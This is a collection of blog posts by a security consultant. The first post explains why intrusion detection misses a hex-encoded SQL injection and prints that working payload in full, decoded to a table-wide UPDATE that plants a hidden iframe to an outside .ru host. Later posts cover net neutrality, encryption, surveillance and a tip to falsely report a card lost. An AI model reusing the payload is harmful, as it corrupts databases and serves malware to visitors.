Michael N. Dundas

A friend and co-worker of mine Jerry Mangiarelli recently posted about a SQL injection attack that he has been following.  You can read his post here.  As he indicates, it is not a new attack, nor a very complex attack.  If you are interested in more details of the attack, SANS has more detailed review of the attack available here. My focus is not so much on the attack itself, but on the detection of the attack with security devices and why it is harder problem than many realize.

I think this attack is a really good example of how it is difficult for firewall, IPS, and IDS vendors to detect these type of attacks.  While the ability to do so is improving every day, and vendors will claim they can (and in some cases they can), the bad guys do have the advantage.  For the purposes of this post, I want to focus on how the attack attempts to hide from deployed security systems.  This attack can be used as a great example of how easy it is to evade detection systems for people that are not technically dealing with attacks day to day and wonder why it is so hard.

The key to this attack is the CAST function.  This function (which is available in many programming languages), will convert one data type to another.  A set of integers to a letter, a decimal number to a hexadecimal number are two examples.   In the attack, hexadecimal is used to mask the alphanumeric requests to the database.

If you look at the actual CAST function request, you see a 0x (means the next characters are a hexadecimal base) followed by:

6445634c417245204054207661526368615228323535292c406320764152434841722832353529206465634c417265207461624c455f635572734f5220435552534f5220466f522053454c45437420412e6e616d652c622e6e614d652066726f4d207379734f626a6543747320612c737973434f4c754d4e73206220776865524520612e69643d422e696420614e4420412e58745950653d27552720616e642028622e78545950653d3939206f7220622e58547970653d3335206f5220422e78545950653d323331204f5220622e78747970453d31363729206f50454e205441624c655f637552736f72206645544348206e6558542046524f6d205461426c455f437552734f7220494e744f2040542c4063207768696c4528404046657443685f7374417475533d302920626547496e20657845632827557044615445205b272b40742b275d20536554205b272b40632b275d3d727452494d28434f4e5665525428564152434841722834303030292c5b272b40432b275d29292b6361535428307833433639363637323631364436353230373337323633334432323638373437343730334132463246364536353644364636383735363936433634363936393645324537323735324637343634373332463637364632453730363837303346373336393634334433313232323037373639363437343638334432323330323232303638363536393637363837343344323233303232323037333734373936433635334432323634363937333730364336313739334136453646364536353232334533433246363936363732363136443635334520615320766152434861722831303629292729204645544368204e6578742066526f6d207441426c655f635572734f7220496e744f2040742c406320456e4420436c6f7365207461626c455f437552736f52206445414c4c6f43415465205461424c655f435552736f7220

The CAST function will convert the hexadecimal above to alphanumeric. The result of that conversion is:

dEcLArE @T vaRchaR(255),@c vARCHAr(255) decLAre tabLE_cUrsOR CURSOR FoR SELECt A.name,b.naMe froM sysObjeCts a,sysCOLuMNs b wheRE a.id=B.id aND A.XtYPe=’U’ and (b.xTYPe=99 or b.XType=35 oR B.xTYPe=231 OR b.xtypE=167) oPEN TAbLe_cuRsor fETCH neXT FROm TaBlE_CuRsOr INtO @T,@c whilE(@@FetCh_stAtuS=0) beGIn exEc(‘UpDaTE ['+@t+'] SeT ['+@c+']=rtRIM(CONVeRT(VARCHAr(4000),['+@C+']))+caST(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E aS vaRCHar(106))’) FETCh Next fRom tABle_cUrsOr IntO @t,@c EnD Close tablE_CuRsoR dEALLoCATe TaBLe_CURsor

Now you can see how this looks more like a SQL statement, it is just masked.  Where it becomes difficult for IPS/IDS vendors is that the translation that I did above, doesn’t happen until it reaches the sql engine for the targeted database.  So in flight through network it appears as hexadecimal.  Do you design your IPS/IDS systems with a sql engine that performs this function on every command?  That takes time and resources. And what would you trigger on exactly in the decoded section above?  The most logical thing to detect on in the decoded section, the attackers have actually hidden.

If you look carefully, there is a second CAST function nested within the first CAST function.

caST(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E

If you convert the hexadecimal in this inner CAST function you get:

<iframe src=”http://nemohuildiin.ru/tds/go.php?sid=1″ width=”0″ height=”0″ style=”display:none”></iframe>

This would be the logical area to detect.  A SQL query containing an HTML IFRAME tag to an external unknown website.  And this is the attack.  The problem is that the IPS/IDS, firewall or other security would have to do the extra function of converting the CAST within the CAST function.

Processing recursively  is resource intensive.  How many times to you recurse through the CAST function?  Are there other functions in SQL you should check?  What about if it is not hexadecimal but octal or some other numerical base?

While security vendors often claim they can detect the above, there are often many conditions around those claims that they do not explain.  Encryption, nested functions as above are but a few examples.  These problems go beyond just SQL injection as well, and apply for many types of attacks.

When evaluating these technologies, it is important that you have someone on your side that is independent of any vendors.  An employee or consultant that understands your requirements, is technically sound and solid about how the technology works (not just in theory), and can work on your behalf to ensure you understand exactly what the technologies can and can not do.  You then have a real understanding of the risks and exposures you face.

photo credit

Kenneth David (@kennethdavid) responded to a post I wrote entitled “Google, Verizon and the creation of private networks”.  My post original post is here, and Kenneth’s response is here.  I have never met Kenneth, but I follow him on twitter as he provides informative tweets.  We have common friends too.  He actually works for a friend of mine.

Kenneth in his response suggested that using a highway is a better analogy to how bandwidth is used than electricity.  I completely agree with him.  I have used both analogies many times to explain bandwidth.  For me I have found that electricity seems to work better.  Maybe because it is is similar in the sense that you get a monthly bill, you are billed typically in a unit/time type of format.  It comes into your home.  So while I agree that a highway analogy is in fact more similar to bandwidth usage, using it as an analogy to explain bandwidth to my wife’s step-dad, just gets him confused and he misses the point that I am trying to actually get across.  Kenneth also introduced 3 elements that he discussed:

Mobile bandwidth is not unlimited. No resource  is unlimited, however it is true that mobile has some unique characteristics in this regard.  That being said, data to support the claims comes from the service providers themselves.  We have to assume they are being honest.  If you have done any statistics you realize that data can be manipulated or interpreted to their advantage.  How do we know they are not doing that?  I know people and companies that are hired to do exactly this.

Bandwidth is a resource that is shared. Very true statement, just like the highway, electricity, gas, air etc. most resources are shared.  There is a lot of debate as to how much bandwidth their really is, how much their could be, the cost associated with increasing bandwidth and who should bear that.

Mobile or wireless introduces a little more complexity on the consumer end.  It uses radio  frequencies which have to be shared amongst the devices in a particular region.   On top of that you have the complexities of the number of towers in a particular area, number of users, type of terrain (hills, flat, tall buildings).  I am not a cellular expert so I am sure I am not doing it justice.  That being said, I have worked on projects involving wireless and one thing that I found common amongst providers is that the data about frequency and bandwidth usage for a specific tower was sparse and any data the provider did have was very closely guarded, even to our teams who were trying to help them.

This is one area where I would legislate laws.  Any service provider in the wireless space would be required to provide real-time access to their cellular usage data.  That data is accessible 24×7 by government.  It is a legal requirement to getting and maintaining a license.   Sounds a little draconian? I know.  The problem is that we have to trust the service providers to do the right thing.  To do what is best for everyone.  They won’t.  They will do what is best for them and their shareholders and what makes them the most money (they legally have to do this).  If this happens to line up with what is best for everyone great. But doing the right thing for everyone is not their goal.   Oversight is needed and it has to be legally enforceable.

Bandwidth is something that can be unfairly leveraged by a single user or group of users unlike any other utility. Not sure I completely agree with this.  I think given the current setup, and investment (or lack of)  in wireless and broadband infrastructure  it is easier to exploit bandwidth by a single user or group of users than other utilities.  Utilities such as electricity, gas, and the highway have been around long enough that we have technology and people in place to monitor these resources.  We have years of experience with these resources, their abuse and problems.  As such, we have proven technology in place, and experienced people and procedures to detect and manage problems.  In the service provider world these are not as prevalent.  I worked for a company that provided these types of services.  There are a few problems.  First, the technology is new and developing.  Unlike electricity and gas that have been around for years.  Second, the cost to purchase these newly developed and unproven technologies is high.  It is seen as an investment with little to no return and in a competitive market that is a really tough sell.  Third, the service providers are not sure where all this technology is going either.  Over the last few years it looks like everything is going mobile and it is, but what is next?  What should they prepare for?  What new technology will they be required to purchase to handle the next ‘wave’ of customer wants?  They don’t know either.

For me it all comes down to oversight not bandwidth management.  It is not reasonable to assume that a business will do the right thing when it comes into conflict with making money.  As an example, the net neutrality debate has been going on for years.  The only time service providers make any good faith efforts has been when there is a real threat of regulation.  A infamous ISP in the USA blocked P2P of it’s users quietly and didn’t tell anyone.  When people suspected and asked if they were blocking it was denied.  It wasn’t until an annoyed customer with the technological background and know how sat down and proved they were in fact blocking P2P they finally admitted it.  I’ve seen policies deployed at service providers to allow quick response times when someone is ‘checking’ the response time, but shape when actually downloading a game (yes, there is technology that will do this and it is deployed).  The customer service representatives are typically unaware of these policies and how they affect customers.  If they are aware, they are not permitted to tell customers what exactly they are doing (hopefully this is changing).

The Internet is no longer a luxury.  It is no longer something the ‘geeks’ just do.  Like electricity, gas, medicine, food and others, it is a necessity to functioning today.  Giving a company in the business of making money off traffic,  the power to decide what traffic is or is not important is not smart.  There needs to be oversight.  That oversight needs to be independent of the requirement to make money off traffic, have the ability to  review (in real time) decisions made around traffic management, and most importantly legally enforceable.

photo credit

Lots of discussion about the latest Google and Verizon agreement on Net Neutrality in an attempt to avoid government regulation.   Even our NDP government has commented.  I recall a discussion a years ago about creating a ‘new Internet’.  The idea was that it would be a separate network  that would be paid for.  Think back prior to the Internet to the days of  AOL, and many dial-up BBS where you paid to access content on their systems.

If the big ISPs are thinking about creating separate premium networks, they need Google to index them and provide a method for people to find this premium information.  Google wants to index ‘everything’ and be the place to go to find information, so it only makes sense they work with the ISPs to not be left in the cold.

It is too bad Google has backed down on their net neutrality stance.  Their rationalization includes the need to get government and industry to move forward, need to create a position of compromise.  No matter, at the end of the day, Google has backed down and changed their position period.  This unfortunately has large ramifications for Net Neutrality.

To me, the answer is simple.

An ISP should be in the business of moving data quickly. Who originates that data, what the packets of flows contain does not matter to an ISP.  The ISP routes the data to its destination as quickly and efficiently as possible. They charge appropriately in a competitive and open market for the service.  Using this revenue, they can upgrade and provision their networks accordingly.  This should be legislated as a requirement and enforced and they should have to justify if asked by government why they are doing what they are doing and provide appropriate proof as required.

An ISP should charge accordingly. Enough of the excuses that people won’t pay the appropriate amount of money required so we can upgrade the infrastructure to meet demands. You  are just scared of competition.  If all the ISPs charge for usage (like electrical companies), people will pay it.  They will have to if they want to use the Internet, and I’d argue the Internet is considered a required service, just like electricity.  I’ve read studies showing people will forgo TV service and phone service to keep their Internet.  If you can’t cover your costs and expenses, then go out of business.  There is always competition waiting to service the customers you are not able to.

An ISP should NOT be permitted to be involved with or own any type of content providing service. This should be legislated.  You route packets, monitor links, and manage the network.  That is what you do best.  That is all you are permitted to do, so do it well.  This should be legally enforced.  You do not provide any content, content providers do that.  Just as my  electrical company doesn’t provide me with anything more than electricity to my home.  Other business provides services that use the electricity, not my electrical company – they provide me with electricity and charge accordingly.

An ISP does NOT monitor content and are not law enforcement. ISPs are experts at moving data not investigations.  Law enforcement and private companies that specialize in investigations and criminal activity do the investigations.  ISPs never act as law enforcement.  Questioning the legality of the data or activity is not the ISPs responsibility and they do not care (and should not be held accountable).  Similar to an electrical company where a house is using way more electricity than other typical houses – you provide and charge them accordingly.  If law enforcement is investigating criminal activity (what they do best) and provide you with a warrant to obtain the usage at a particular location you service, you may provide that information to law enforcement but that is it.  Law enforcement takes that information and does the investigation – that is what they do best.

Is it more complicated then that?  Personally I am doubtful it is.

What do you think an ISP should be legally permitted to do?

photo credit

Update (Aug 13, 2010 @10:22): Kenneth David (@kennethDavid) wrote a response to my post.  You can read it here.

I have been following the RIM security saga with India and Saudi Arabia.  I have previously mentioned, I have been in the U.A.E. in the past performing security consulting.  A few facts I know:

All HTTP goes through a proxy. If you connect to a service provider, all your flows go through an HTTP proxy system.  The proxy system scans requests and compares them to a database of categorized sites.   The government provides policies to the service providers, and it is required by law they are enforced.  They are enforced in real time.  Attempting to visit an unauthorized site you will be re-directed to a page in Arabic explaining that it is not permitted.  I actually kept a screen capture of the page and was going to post it, but I can’t find it.  However, if you are in Dubai, just try to go to a site that has questionable material.  You will be re-directed.  Anyone can do it, it is not a secret.

HTTPS was ready to be implemented. Approximately 2 years ago, they were testing the ability to decrypt SSL on the fly so that they could perform analysis on the requests and grant or deny access as with HTTP traffic.  I am sure this is deployed by now.

Voice Over IP, Instant messaging and other protocols had specific policies. I won’t go into the details here, as I don’t know how public this information is, but there were active policies deployed around these and other protocols.

Privacy is not the same as North America. In North America, we many feel that privacy is slowly being eroded.  In comparison to Dubai our policies with respect to privacy are impressive.  The ISP has the right to watch what you are doing and actively grant, block, and log your activities.  It is actually a requirement in order to get a license to be an ISP from the Government.

When Saudi Arabia indicated they were going to ban Research In Motion devices due to the fact the government was unable to decrypt communications as needed, I was hopeful that RIM would say too bad.  Of course that was the idealist in me hoping that RIM, a Canadian company with one of their key features they market is  about Blackberry and its security would not be compromised.  The realist in me understands that the Middle East is a growing market and from a business perspective RIM has no choice but to be a part of it.  If you want to do business in Canada you have to play by our rules, so it only makes sense that if you want to do business in the U.A.E., you have to play by their rules.  As expected, RIM reached a deal with Saudi Arabia.  They also reached a deal with India earlier this week.

What I find amusing is the latest Spin they have put on security given the situation.

RIM made no direct comment on any discussions with the UAE or others, but it sought to reassure customers about the security of their data on BlackBerry networks.  “While RIM does not disclose confidential regulatory discussions that take place with any government, RIM assures its customers that it is committed to continue delivering highly secure and innovative products that satisfy the needs of both customers and governments,” the company said in a statement to customers.

A RIM spokeswoman could not be reached for comment.

RIM said in its statement that under its security system customers have their own encryption key and “only the customer ever possesses a copy” of that key.

While I am sure they have not lied, you can’t have it both ways.  Either you comply with the government request that they can decrypt messages and data as they require, or you don’t.  Any other suggestion implies that the laws within the UAE have changed.  I am not a lawyer, but I haven’t seen any news about new laws protecting UAE citizens privacy.  The best part is the last statement how the customers have their own encryption key that only they possess.  I am sure that statement is true.   But it is what is not said that is telling.  Are there any more encryption keys other than the one the customer possesses with respect to the customer’s messages?   Companies that deploy encryption and decryption of email, files, and data in general give each employee a copy of their own key that only they possess.  When encrypting data, the system creates some sort of a unique key (lets call it E) that is actually used to encrypt or decrypt the data.  The E key is then encrypted with the customers encryption key (lets call that key Ec).  The trick with businesses, is that the E key’ is also encrypted with their own key (lets call it Eb).  If you loose your key (Ec) or refuse to give it when asked, they can use their key Eb to decrypt and obtain E key.  Once they have the E key, they can then decrypt the message.  There are several variations to this but the basic premise from a recovery perspective are the same.

This is not the first time this has happened either.  Not sure how many people remember Hushmail.  I wrote about them here.  Hushmail marketing was based on the fact that if you used them for email, no one but you could retrieve your email stored on their servers.  Even Hushmail staff was not able to retrieve the email if they wanted to as they did not have the keys.  (Sound familiar to the RIM article above?).  Yet, when U.S. law enforcement contacted them about an individual they were investigating, Hushmail was able to provide them with 12 CDs filled with unencrypted emails of the individual under investigation.

While I don’t blame RIM for their bowing to the governments of India and Saudi Arabia if they wish to do business in their countries, I dislike the spin they are placing on security.   They are mis-leading the public and playing on the fact that many people do not understand the intricacies of security.  While they are not lying, I strongly suspect they are not being forthright.

When all the dust settles, it is important that people realize that money is what drives business.  You can claim all morals, goals, and visions you want.  But if at some these come into conflict that causes enough money to be at stake compromises will be made.  Security unfortunately is no different.

I have read and been told by researchers and vendors over the years about a “best practices” for this technology or for that type of deployment.  I have discussed best practices with clients as a consultant, as a vendor promoting products to a potential customer,and as a consumer of a particular technology or design.  The ‘best practices’ concept seems to come and go over the years.   Recently, the frequency of mention of ‘best practices’ has been dramatically increasing in my world.  I am not sure if this is due to a general trend in the industry, or just myself being back in the financial services world.

I have always been very wary of ‘best practice’ when it is mentioned and when it is applied I tend to scrutinize it.  Here is why.

1. Lessens the sense of ownership. After all, you didn’t really create the solution.  You followed the ‘best practices’ for the particular solution you were deploying.  Sure, you added a few twists and exceptions, but really the bulk of it was already predefined.  If something goes wrong, it is not totally your fault.  After all you followed best practices right?

2. Stifles innovation and creativity. You don’t have to come up with a solution, create or design a system to handle a particular problem.  It is already created by ‘best practices’.  Obviously the best practices are proven and smarter people came up with them than your team.  Why re-invent the wheel?

3.  Who declared it to be best practice? I have never seen scientific reasoning for why something is considered a best practice.  Typically, the rationalization is that everyone else has done it this way, so it is the ‘best practice’.  If your competitors have all done it this way, then should you really spend the time figuring out if they have done it right?  If they all did it, then obviously it is the best way to go.

4.  Used as manipulation by vendors. Every vendor tries to manipulate ‘best practices’ to favour the particular set of technologies they are trying to sell you.   They often do this by ‘teaching’ the customer about best practices and how their product suite best fits.  It also assists them to influence your decision making process.  By touting ‘best practices’ they can elegantly neutralize employees ideas on how to solve a particular problem when their solution may not fit.  They are not personally telling you that your ideas are wrong, the best practices are.  They are just helping you understand so you don’t make a mistake.

I do believe ‘best practices’ have their place.  A project team should consider all ‘best practices’.  The ‘best practices’ provided by your current vendor, ‘best practices’ provided by your current vendors competitors.   The team should research ‘best practices’ that are not vendor related.  These should be given weight, but less weight than that of the project teams opinions.

Ideally, the team comes up with the design that meets the requirements.  Once and only once the team is comfortable with their solution, it is vetted it against the ‘best practices’.   Using this approach, the team feels a sense of ownership for the solution.  The team created something based on requirements and their skills and knowledge.  They took into consideration the many ‘best practices’ available, tweaked their solution where necessary after careful and conscious thought.  If done correctly, the end result is a solution where a sense of ownership is felt, any innovative and unique ideas were considered and incorporated, best practices were given their due consideration, and the best vendor and technologies are chosen.

photo credit

Grooveshark.com rocks!  I have been using them regularly as a source of music since the fall of 2009.  A couple months ago I even purchased a year subscription I liked them so much.  Why?  Unlike Xmradio and Last.fm, they give me what I want.

I have created a play list for when I run that I periodically update.  I have a separate play list for when I workout, and another when I am in the office working.  They do not limit play lists or music listening.  They even have Grooveshark Radio which will pick songs for you based on your criteria selection and taste.  Everything is available without a subscription as well.   The difference between subscription and non subscription is advertisements.  Non subscription users will see advertisements appear on the side of the screen while music was playing.  Obviously these will go away when you purchase a subscription. But that is not why I purchased a subscription.  I purchased a subscription because unlike others they gave me the customer what I want.

My wife has an Xmradio in her car and we have a subscription.  The subscription permits you to log on via the web and listen sort of.  They have a ‘better sounding’ version you can pay extra for to listen on the web.  For basic subscribers that only have a car radio and do not wish to give them more money than we already do, there is a lower quality version if you choose to listen on the web.  In order to run it, I had to use a windows machine (the only windows machine in the house is my work one).  I had to run Internet Explorer as apparently Firefox isn’t supported.   Aside from their obvious vehicle penetration, the service is really a subset of what Grooveshark offers at a higher price point and they are difficult to deploy in the home.

Last.Fm I have already written about here and here.  My views on them have not changed.

If Grooveshark offered an ‘in vehicle’ version of their service I’d sign up.  I’d gladly give the money we pay for our XMradio subscription to them. Based on my feelings about these online services, I found the latest Google Webtrends data interesting.

Grooveshark is a slow almost constant trend upwards. Xmradio.com is the reverse (of course this represents web access not vehicle access), and Last.fm, is heading downward in 2010.

If you use online music services, give Grooveshark a try.  You won’t be disappointed.

Several years ago I was hired to assist with an internal investigation.  The client, a large company had some concerns about an employee and wanted to covertly gather information and data on what this employee was doing while at work.   For about a week, I sat passively on the network, monitoring the subjects connections to servers, internet systems, e-mail, instant messaging and any other network connection.  There was not the selection of automated software there is today to accomplish this, so most of it was done with packet sniffers.  I would gather the data, use scripts to extract specific types of data and run it through statistical analysis, look for data that was ‘different’ or ‘suspect’ in some way. Basically the goal was to profile the user, compare his activities to other users.  Then using this profile, identify and focus on things that didn’t fit.   Personally, I found it a little creepy.  Looking into the details of someone’s private life is not really fun, a part of me felt like I was being invasive, not respecting their privacy — and technically that is true.  But it was the job, what I was asked to do.   Sometimes doing things one would prefer not to do is necessary.

One thing I had identified to the client was that the subject was using a type of VoIP software.  They asked if it was possible to listen in on the voice conversations.  I told them it was, and that I could probably get them a copy of the voice conversations the subject previously had during the time I was monitoring.  I had packet captures, most non-encrypted so it was just work and time.  At the clients request, I extracted the VoIP conversations into wmv files using date and time of the call as a file name.

At the end of the job, I was having a conversation with the CTO.  He was wondering if there was an automated way to keep audio conversations of all the employees.  At the time, this technology was not as prevalent, cheap, and available to the general public as it is today.  I asked him if he thought that was really appropriate.  I explained that I had just listened in on someones private conversations.   Maybe it wasn’t any of the companies business.   Maybe there were legalities if they were to do that (yes, I was annoyed).  His response was very quick.  “The company has a right to view all data, monitor activity that its equipment or network is used for, period”.   He told me all the employees know this and sign a document to that effect.  I said that made sense.   I asked him what he would think if he was in a confidential conversation on the phone with someone in a different province and Bell had listened in on his conversation?  I said that I assume he didn’t have problem with it, after all it is their network, their devices.  Aside from the angry facial expression, he said that was ‘different’ and they shouldn’t be allowed to do that.

Fast forward to now.  Everyone has a video camera or picture camera on them as a result of mobile phones.  If you are serious about it, you can find all kinds of tiny spy cameras.  Rob Spence has implanted a camera in his eye. It amuses me when law enforcement gets all concerned about citizens taking their picture and video taping them.  I guess they feel that they should be able to watch and monitor us, but we shouldn’t be able to watch and monitor them.  Of course if they are not doing anything wrong, then they should have nothing to worry about right? (that statement is an entire topic in and of itself).

Everyone has reasons why a particular person or group of people should or should not be monitored.  It really comes down to the basic premise that we as humans don’t want to be monitored, but we want the ability to monitor others, especially if we deem them as a threat.  Government wants the ability to covertly monitor their citizens but do not want organizations covertly monitoring them.  Police want cameras everywhere so they can monitor what is going on and use it to assist with their job, but they don’t want to be video taped in case they get caught doing something controversial, such as Robert Dziekanski being killed by officers at Vancouver airport. The video once released on the Internet, forced police to change their story.  Businesses feel they have a right to monitor their employees, but would have concerns if employees were monitoring some of their activities.

Personally, I think it is futile to attempt to stop one group from monitoring another, especially in public places.  It will never be successful.  Who do you feel should be able to monitor who?   Under what circumstances and conditions is video or audio surveillance appropriate?

photo credit

I have a Visa card that I use only when I am on business.  The idea being that all charges on that card are business related and are therefore re-paid by clients.  As such I am forced to on a regular basis walk through all the transactions, ensure I have the appropriate documentation, submit it to the appropriate parties so that I get the money back.  I say forced because I really hate doing expenses, so much so that I will avoid it as much as humanly possible.

I have been traveling for work a fair bit lately, and two months of expenses have piled up.   Begrudgingly, I sit down to do my expenses. All the transactions are fine, except for two, one on each month for $6.79 cents from a company called clickandbuy.com.  Not a company I have dealt with.  I go to the clickandbuy.com website.  In the FAQ section I find an entry describing my problem.  In order to contact them electronically, I have to register first, giving them a bunch of information I don’t want to give them.   The fact is they probably already have the information from whatever method they obtained my credit card information, but I don’t want to confirm it, I don’t want to be their customer.  There is a long distance number I can call if I want a person directly, no toll free number.

Next, I call my Visa company.  I get the standard series of  endless automated prompts.  Eventually I get an option for customers that wish to discuss specific charges on their account.  Selecting that option the first thing the recording system tells me is (paraphrased):  If the charge in question is related to an internet transaction, please contact the vendor to resolve the charge.  If I still have trouble, I can work with them because after 45 days the transaction is my responsibility.  I wait on the line.  Next I receive a message that they are not open right now and to call back during ‘normal business hours’, which they don’t provide.

At this point I have spent approximately 30 minutes, dealing with two transactions worth $13.58 on my weekend.  I am mad at clickandbuy.com and I am furious with my Visa company.  How dare they waste my time.  How dare they permit a charge to be placed on my card, then make it inconvenient for me to discuss and dispute the charge they put on a card I did not authorize (at least not knowingly).   The question becomes, how do I save my time?  I call my Visa company back up select the ‘report a lost or stolen Visa’ option.  I immediately get a person, who is very helpful and I have a new card coming to me in a few days.

Why did I do this?  Well this happened to my wife about a year ago and experience is a good teacher.  Different financial institution, different scummy vendor.  We spent hours of time and frustration on the phone, email, filling out forms, responding to voice mails, waiting on the phone in queues.  Not worth it.   And since the Visa companies value the merchant and their time more than their customers and my time (this is obvious by their actions), I can play that game too. In five days it will be all fixed, minimal time lost and stress induced for me.

End result is that scummy ClickandBuy.com, obtained $13.58 from me due to the despicable and scummy business practices they employ — you are welcome Clickandbuy.com.  $13.58 vs. calling my Visa company repeatedly, having to fight with them, then having them send me forms via snail mail, which I have to fill out, return via snail mail or fax, then wait for the to investigate and decide, easy choice.

As for the company who provides me the Visa, I will receive a new one next week.  I may not activate it however.  I am going to look around, maybe select a new provider.  Sure they will probably be the similar with rules as my current Visa company when it comes to despicable companies like clickandbuy.com.  My Visa company is big and I am just a tiny little single customer.  But I will do it on principle.  I highly recommend that everyone that has a problem like this to just call in and report your card lost.  They have to terminate the card, they have no choice.  They are obviously trying to push the Internet purchasing problem off to their customers rather than come up with a solution.  This makes it their problem again, which is where the problem is and should be.

I am not a lawyer, nor am I a politician or a copyright expert.   I have been following the copyright debate quite religiously for the last 3-4 years, trying to learn what I can.  In Canada Bill C-32 has been tabled to update the copyright laws.  There has been lots of discussion about the Bill, specifically around the digital lock rules in this bill.   Big industry wants to protect their materials, by making it illegal to remove digital locks, for any reason whatsoever, without permission of the copyright owner.  It also seems that it is illegal to publish tools that would assist others to break digital locks.  Both of these issues concern me.

See, I do research into security technologies as part of my job.  Security is also a personal interest of mine.  As an example, I am currently looking into a particular application that uses SSL to encrypt the data between points.  In order to do what I need to do for the research, I downloaded an open source tool, that basically breaks the SSL.  This allows me to work on my research with the application in question. If that tool was not published due to Bill C-32, then that stops me from doing my research.  I suppose I could create my own version of the tool, but why would I do that if someone already has a tool readily available?  It makes no sense.   The most likely response to my specific example is that SSL isn’t proprietary so it does not matter.  That is true in this case, but what about when I am evaluating a Blackberry PDA or an IPhone?   I suspect RIM and Apple might not take to kindly to me exposing problems in their software.  See, the current Bill C-32 might allow them to do this.   That is bad for security, bad for keeping companies honest.

I think it makes more sense to punish those that use the tools in a wrong way.  If someone was to take the tool, and use it in a botnet to extract credit card information, then the individuals that did this are guilty and should be charged.  The person that made the tool is not the guilty party.  It is like making Smith & Wesson responsible because they created the firearm that was used in a murder.

Overall, I think Bill C-32 has made much progress from the previous bills in Canada.  My hope is that the Government starts to do their job and properly debate the bill and get input from all interested parties, not label people that question them as extremists.

A couple of years ago I was at a client’s site in Dubai.  The client was an telco, and I was doing some security consulting for them.   Like many countries in the Middle East, Dubai actively monitors data entering and leaving the country.  Privacy laws as far as I could determine do not exist.  All internet communications are actively monitored.  It is quite common to suddenly see a web page pop up explaining in Arabic that the site you are trying to view is not authorized and you have been denied.  Telcos there have spent millions of dollars on infrastructure in order to enforce these requirements.  The design is not as complex as one might think, just resource intensive.  Resources are required to process the data real-time and staff is required to maintain the infrastructure, look into events and other tasks.  Telcos do this because it is required  by law.  You can not obtain a license as a Telco unless you have monitoring capabilities deployed.

My first day in Dubai, I went to lunch with one of the executives of the Telco.  During our lunch, I asked him how they manage encrypted connections.  He explained that they were currently getting ready to deploy a solution to solve that.  The infrastructure was being upgraded to decrypt all SSL sessions and parse the data as required.   Aside from opening my eyes to the difference in privacy between North America and the Middle East from a privacy perspective, I found it interesting that SSL decrypting was so easily available.   Previously, I had seen software that law enforcement used for this purpose.  I myself had done it for clients using available tools during a engagement.  But these tools were designed more for targeted surveillance, not mass scale.  Like all technology, it improves and gets less expensive over time I guess.

Today, there are many more companies in North America and abroad that either have deployed SSL decrypting capabilities or are in the process of doing so.  Security, diagnostics, audit and legal requirements to know what is coming and leaving their networks and being able to log and trace back data transmissions to the originator are some of the reasons.  One driver is Data Leakage Protection (DLP), currently a very ‘hot’ topic with many new vendors jumping on the opportunity with solutions.  In order to look for data leakage, you need to see past any encryption that might be present.  Cisco, Bluecoat, PaloAlto, Fortinet are just a few companies that offer products for SSL decryption.

With Google deploying encryption for Gmail and more recently searching, plug-ins such as the EFF Firefox plug-in to help secure your communications, companies are feeling more and more concerned about what data is coming and going.  What worries me is that all these security, legal and audit requirements companies face are actually not helping them in the long run.   If these companies are decrypting SSL sessions that egress and ingress their network, you can be sure that other companies are doing the same to theirs.  The net result is that everything is decrypted and no one has any privacy.

Next time you connect to your bank, doctor’s office, insurance company, Gmail or any site and see secure indications from your browser similar to these

along with the companies re-assurances that the site is secure, keep in mind things may not be as they appear – today even more so than yesterday.

Do you deploy any type of decryption on your network?  If it is deployed are you aware of it?

photo credit